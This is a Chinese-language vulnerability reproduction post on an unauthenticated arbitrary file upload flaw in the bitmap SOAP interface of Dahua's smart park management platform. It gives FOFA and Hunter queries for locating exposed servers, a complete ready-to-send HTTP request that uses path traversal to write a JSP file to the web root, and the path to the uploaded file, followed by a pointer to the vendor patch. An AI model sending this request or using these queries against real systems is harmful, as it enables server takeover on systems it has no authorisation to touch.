【漏洞复现】大华智慧园区综合管理平台-bitmap-任意文件上传漏洞

免责声明

文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

大华智慧园区综合管理平台是一款综合管理平台，具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配，满足多元化的管理需求，同时通过提供智能服务，增强使用体验。

大华智慧园区综合管理平台 bitmap 接口存在任意文件上传漏洞，未对上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤，导致攻击者可以通过利用未授权接口上传任意文件，获取服务器权限，从而控制服务器。

影响范围

大华智慧园区综合管理平台

资产测绘

FOFA:
app=“dahua-智慧园区综合管理平台”
body=“/WPMS/asset/lib/normalize.css”
Hunter:
app.name=“Dahua 大华 智慧园区管理平台”

漏洞复现

一、上传文件：

POST /emap/webservice/gis/soap/bitmap HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: text/xml; charset=utf-8
Connection: close
Content-Length: 505

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.bitmap.mapbiz.emap.dahuatech.com/">
    <soapenv:Header/>           
        <soapenv:Body>
                <res:uploadPicFile>
                    <arg0>
                    <picPath>/../test.jsp</picPath>
                    </arg0>
                    <arg1>VnVsbmVyYWJpbGl0eSB0ZXN0aW5nISEh</arg1>
                </res:uploadPicFile>
        </soapenv:Body>
</soapenv:Envelope>

二、访问文件地址：upload/test.jsp

修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://www.dahuatech.com/
https://support.dahuatech.com/